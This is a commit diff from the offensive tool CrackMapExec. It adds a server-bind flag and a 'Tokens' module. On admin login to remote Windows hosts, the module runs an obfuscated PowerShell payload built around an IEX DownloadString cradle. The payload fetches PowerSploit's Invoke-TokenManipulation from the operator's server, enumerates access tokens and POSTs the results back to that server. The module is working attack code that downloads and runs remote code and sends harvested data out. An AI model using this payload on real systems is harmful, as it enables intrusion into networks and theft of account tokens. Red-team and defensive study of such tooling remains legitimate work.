Added a tokens module to enumerate available tokens

byt3bl33d3r · byt3bl33d3r · commit 7bfe04236a3c · 2016-03-30T12:58:55.000-06:00
Added a --server-host flag to specify the IP to bind the server to
diff --git a/core/cmeserver.py b/core/cmeserver.py
@@ -36,12 +36,12 @@ def stop_tracking_host(self):
 
 class CMEServer(threading.Thread):
 
-    def __init__(self, module, context, port, server_type='https'):
+    def __init__(self, module, context, srv_host, port, server_type='https'):
 
         try:
             threading.Thread.__init__(self)
 
-            self.server = BaseHTTPServer.HTTPServer(('0.0.0.0', int(port)), RequestHandler)
+            self.server = BaseHTTPServer.HTTPServer((srv_host, int(port)), RequestHandler)
             self.server.hosts   = []
             self.server.module  = module
             self.server.context = context
diff --git a/core/remotefile.py b/core/remotefile.py
@@ -11,7 +11,7 @@ def __init__(self, smbConnection, fileName, share='ADMIN$', access = FILE_READ_D
         self.__currentOffset = 0
 
     def open(self):
-        self.__fid = self.__smbConnection.openFile(self.__tid, self.__fileName, desiredAccess = self.__access)
+        self.__fid = self.__smbConnection.openFile(self.__tid, self.__fileName, desiredAccess= self.__access)
 
     def seek(self, offset, whence):
         # Implement whence, for now it's always from the beginning of the file
diff --git a/crackmapexec.py b/crackmapexec.py
@@ -71,6 +71,7 @@
 parser.add_argument("--smb-port", dest='smb_port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
 parser.add_argument("--mssql-port", dest='mssql_port', default=1433, type=int, metavar='PORT', help='MSSQL port (default: 1433)')
 parser.add_argument("--server", choices={'http', 'https'}, default='https', help='Use the selected server (default: https)')
+parser.add_argument("--server-host", type=str, default='0.0.0.0', metavar='HOST', help='IP to bind the server to (default: 0.0.0.0)')
 parser.add_argument("--server-port", dest='server_port', metavar='PORT', type=int, help='Start the server on the specified port')
 parser.add_argument("--local-auth", dest='local_auth', action='store_true', help='Authenticate locally to each target')
 parser.add_argument("--timeout", default=20, type=int, help='Max timeout in seconds of each thread (default: 20)')
@@ -215,7 +216,7 @@
         module.options(context, module_options)
 
         if hasattr(module, 'on_request') or hasattr(module, 'has_response'):
-            server = CMEServer(module, context, args.server_port, args.server)
+            server = CMEServer(module, context, args.server_host, args.server_port, args.server)
             server.start()
 
 for target in args.target:
diff --git a/modules/credentials/tokens.py b/modules/credentials/tokens.py
@@ -0,0 +1,68 @@
+from core.helpers import create_ps_command, obfs_ps_script, gen_random_string
+from StringIO import StringIO
+
+class CMEModule:
+    '''
+        Enumerates available tokens using Powersploit's Invoke-TokenManipulation
+        Module by @byt3bl33d3r
+    '''
+
+    name = 'Tokens'
+
+    def options(self, context, module_options):
+        '''
+        '''
+
+        self.obfs_name = gen_random_string()
+
+    def on_admin_login(self, context, connection):
+
+        payload = '''
+        IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-TokenManipulation.ps1');
+        $creds = Invoke-{func_name} -Enumerate | Select-Object Domain, Username, ProcessId, IsElevated | Out-String;
+        $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
+        $request.Method = 'POST';
+        $request.ContentType = 'application/x-www-form-urlencoded';
+        $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
+        $request.ContentLength = $bytes.Length;
+        $requestStream = $request.GetRequestStream();
+        $requestStream.Write( $bytes, 0, $bytes.Length );
+        $requestStream.Close();
+        $request.GetResponse();'''.format(server=context.server, 
+                                          port=context.server_port, 
+                                          addr=context.localip,
+                                          func_name=self.obfs_name)
+
+        context.log.debug('Payload: {}'.format(payload))
+        payload = create_ps_command(payload)
+        print connection.execute(payload, get_output=True)
+        context.log.success('Executed payload')
+
+    def on_request(self, context, request):
+        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
+            request.send_response(200)
+            request.end_headers()
+
+            with open('data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1', 'r') as ps_script:
+                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
+                request.wfile.write(ps_script)
+
+        else:
+            request.send_response(404)
+            request.end_headers()
+
+    def on_response(self, context, response):
+        response.send_response(200)
+        response.end_headers()
+        length = int(response.headers.getheader('content-length'))
+        data = response.rfile.read(length)
+
+        #We've received the response, stop tracking this host
+        response.stop_tracking_host()
+
+        if len(data) > 0:
+            context.log.success('Enumerated available tokens')
+
+            buf = StringIO(data).read()
+            for line in buf:
+                context.log.highlight(line)
